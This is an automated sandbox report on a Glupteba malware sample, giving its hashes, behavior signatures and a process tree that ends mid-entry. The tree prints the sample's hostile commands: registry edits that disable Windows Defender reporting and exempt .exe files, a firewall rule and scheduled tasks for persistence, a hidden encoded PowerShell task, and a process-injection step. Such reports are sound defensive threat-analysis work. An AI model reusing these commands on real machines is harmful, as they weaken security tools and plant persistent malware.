Resubmissions

04-02-2024 20:50

240204-zmv5ysadh5 10

17-12-2023 22:34

231217-2hhp6sgbaq 10

Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-02-2024 20:50

General

  • Target

    ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

  • Size

    735KB

  • MD5

    9f5cb3a9a4053a53063a9da9afbf6273

  • SHA1

    b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e

  • SHA256

    ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1

  • SHA512

    aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26

  • SSDEEP

    12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 3 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 7 IoCs
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 38 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
    "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
    1⤵
      PID:3932
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        2⤵
          PID:3980
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          2⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Users\Admin\Pictures\enpqvMM2ICn0pUvImTEz0usm.exe
            "C:\Users\Admin\Pictures\enpqvMM2ICn0pUvImTEz0usm.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 392
              4⤵
              • Program crash
              PID:1016
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 408
              4⤵
              • Program crash
              PID:3792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 412
              4⤵
              • Program crash
              PID:1516
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 696
              4⤵
              • Program crash
              PID:2792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 708
              4⤵
              • Program crash
              PID:4620
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 764
              4⤵
              • Program crash
              PID:2372
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 772
              4⤵
              • Program crash
              PID:1380
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 708
              4⤵
              • Program crash
              PID:2452
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 784
              4⤵
              • Program crash
              PID:2428
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 836
              4⤵
              • Program crash
              PID:4256
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 728
              4⤵
              • Program crash
              PID:4652
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 720
              4⤵
              • Program crash
              PID:3600
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 708
              4⤵
              • Program crash
              PID:3676
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 824
              4⤵
              • Program crash
              PID:3384
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 868
              4⤵
              • Program crash
              PID:4840
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 904
              4⤵
              • Program crash
              PID:3972
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 964
              4⤵
              • Program crash
              PID:3616
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 996
              4⤵
              • Program crash
              PID:972
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
                PID:1216
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 636
                4⤵
                • Program crash
                PID:496
              • C:\Users\Admin\Pictures\enpqvMM2ICn0pUvImTEz0usm.exe
                "C:\Users\Admin\Pictures\enpqvMM2ICn0pUvImTEz0usm.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4848
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 360
                  5⤵
                  • Program crash
                  PID:4880
                  • C:\Windows\SysWOW64\cmd.exe
                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    6⤵
                      PID:3780
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        7⤵
                          PID:228
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                          7⤵
                            PID:4148
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 376
                        5⤵
                        • Program crash
                        PID:2300
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 384
                        5⤵
                        • Program crash
                        PID:2212
                        • C:\Windows\system32\netsh.exe
                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                          6⤵
                          • Modifies Windows Firewall
                          PID:2072
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 660
                        5⤵
                        • Program crash
                        PID:2792
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 712
                        5⤵
                        • Program crash
                        PID:904
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 748
                        5⤵
                        • Program crash
                        PID:4980
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 756
                        5⤵
                        • Program crash
                        PID:2208
                        • C:\Windows\SysWOW64\reg.exe
                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                          6⤵
                            PID:1404
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 712
                          5⤵
                          • Program crash
                          PID:1700
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 724
                          5⤵
                          • Program crash
                          PID:4256
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                          5⤵
                            PID:4236
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1216
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2808
                          • C:\Windows\rss\csrss.exe
                            C:\Windows\rss\csrss.exe
                            5⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Manipulates WinMonFS driver.
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3372
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 404
                              6⤵
                              • Program crash
                              PID:4624
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 420
                              6⤵
                              • Program crash
                              PID:4236
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 428
                              6⤵
                              • Program crash
                              PID:1064
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 700
                              6⤵
                              • Program crash
                              PID:2776
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 744
                              6⤵
                              • Program crash
                              PID:1412
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 772
                              6⤵
                              • Program crash
                              PID:4284
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 780
                              6⤵
                              • Program crash
                              PID:5092
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 800
                              6⤵
                              • Program crash
                              PID:1880
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1496
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 740
                              6⤵
                              • Program crash
                              PID:2516
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 924
                              6⤵
                              • Program crash
                              PID:3888
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 764
                              6⤵
                              • Program crash
                              PID:1172
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 736
                              6⤵
                              • Program crash
                              PID:3336
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /delete /tn ScheduledUpdate /f
                              6⤵
                                PID:3268
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                6⤵
                                • Creates scheduled task(s)
                                PID:3920
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                  PID:432
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1032
                                  6⤵
                                  • Program crash
                                  PID:4084
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1016
                                  6⤵
                                  • Program crash
                                  PID:2900
                                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3136
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:1028
                                • C:\Windows\windefender.exe
                                  "C:\Windows\windefender.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4788
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1136
                                  6⤵
                                  • Program crash
                                  PID:2472
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1076
                                  6⤵
                                    PID:4628
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 748
                                    6⤵
                                      PID:1232
                              • C:\Users\Admin\Pictures\ihrzr2ljvHwFy4zF2fb6VeGx.exe
                                "C:\Users\Admin\Pictures\ihrzr2ljvHwFy4zF2fb6VeGx.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1968
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 392
                                  4⤵
                                  • Program crash
                                  PID:4760
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 704
                                  4⤵
                                  • UAC bypass
                                  • Windows security bypass
                                  • Suspicious use of SetThreadContext
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:3932
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 744
                                  4⤵
                                  • Program crash
                                  PID:4672
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    5⤵
                                      PID:1792
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 744
                                    4⤵
                                    • Program crash
                                    PID:4716
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 732
                                    4⤵
                                    • Program crash
                                    PID:860
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 772
                                    4⤵
                                    • Program crash
                                    PID:4236
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                      5⤵
                                      • Modifies Windows Firewall
                                      PID:2220
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 784
                                    4⤵
                                    • Program crash
                                    PID:2768
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    4⤵
                                      PID:4556
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 412
                                      4⤵
                                      • Program crash
                                      PID:1980
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 408
                                      4⤵
                                      • Program crash
                                      PID:4780
                                    • C:\Users\Admin\Pictures\ihrzr2ljvHwFy4zF2fb6VeGx.exe
                                      "C:\Users\Admin\Pictures\ihrzr2ljvHwFy4zF2fb6VeGx.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                      • Drops file in Windows directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:3384
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 408
                                        5⤵
                                        • Program crash
                                        PID:4012
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 728
                                        5⤵
                                        • Program crash
                                        PID:2756
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 756
                                        5⤵
                                        • Program crash
                                        PID:3360
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 764
                                        5⤵
                                        • Program crash
                                        PID:1876
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 728
                                        5⤵
                                        • Program crash
                                        PID:4208
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4876
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 680
                                        5⤵
                                        • Program crash
                                        PID:3204
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 668
                                        5⤵
                                        • Program crash
                                        PID:3816
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 384
                                        5⤵
                                        • Program crash
                                        PID:3972
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 360
                                        5⤵
                                        • Program crash
                                        PID:2608
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                        5⤵
                                          PID:2212
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          5⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1612
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          5⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2304
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 752
                                          5⤵
                                          • Program crash
                                          PID:5004
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 888
                                          5⤵
                                          • Program crash
                                          PID:3024
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 884
                                          5⤵
                                          • Program crash
                                          PID:4364
                                    • C:\Users\Admin\Pictures\cYfr9xPdB4DJRAqHIFbOJ8kb.exe
                                      "C:\Users\Admin\Pictures\cYfr9xPdB4DJRAqHIFbOJ8kb.exe" /VERYSILENT
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:1036
                                      • C:\Users\Admin\AppData\Local\Temp\is-IQI4O.tmp\cYfr9xPdB4DJRAqHIFbOJ8kb.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-IQI4O.tmp\cYfr9xPdB4DJRAqHIFbOJ8kb.tmp" /SL5="$16022A,831488,831488,C:\Users\Admin\Pictures\cYfr9xPdB4DJRAqHIFbOJ8kb.exe" /VERYSILENT
                                        4⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        • Suspicious use of FindShellTrayWindow
                                        PID:576
                                    • C:\Users\Admin\Pictures\Bxie6CgkZO9xzCGJwmwnW4l0.exe
                                      "C:\Users\Admin\Pictures\Bxie6CgkZO9xzCGJwmwnW4l0.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:3936
                                    • C:\Users\Admin\Pictures\FAFTJzBZJMJBCVAb4igbGRFf.exe
                                      "C:\Users\Admin\Pictures\FAFTJzBZJMJBCVAb4igbGRFf.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1576
                                      • C:\Users\Admin\AppData\Local\Temp\7zSCBAC.tmp\Install.exe
                                        .\Install.exe
                                        4⤵
                                        • Executes dropped EXE
                                        PID:1164
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCD81.tmp\Install.exe
                                          .\Install.exe /JPdidKxawB "385118" /S
                                          5⤵
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Checks for any installed AV software in registry
                                          • Drops file in System32 directory
                                          • Enumerates system info in registry
                                          PID:1096
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                            6⤵
                                              PID:1700
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                7⤵
                                                  PID:1200
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                    8⤵
                                                      PID:2856
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                  6⤵
                                                    PID:4880
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gjRolFiLf"
                                                    6⤵
                                                      PID:4608
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "gjRolFiLf" /SC once /ST 05:58:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                      6⤵
                                                      • Creates scheduled task(s)
                                                      PID:1580
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "gjRolFiLf"
                                                      6⤵
                                                        PID:1820
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ugeOWMZ.exe\" Lc /pbsite_idWLf 385118 /S" /V1 /F
                                                        6⤵
                                                        • Drops file in Windows directory
                                                        • Creates scheduled task(s)
                                                        PID:4012
                                                • C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe
                                                  "C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe" --silent --allusers=0
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Enumerates connected drives
                                                  • Modifies system certificate store
                                                  PID:1648
                                                  • C:\Users\Admin\Pictures\kKvpKmnMp4fgI8GluXYHvgrz.exe
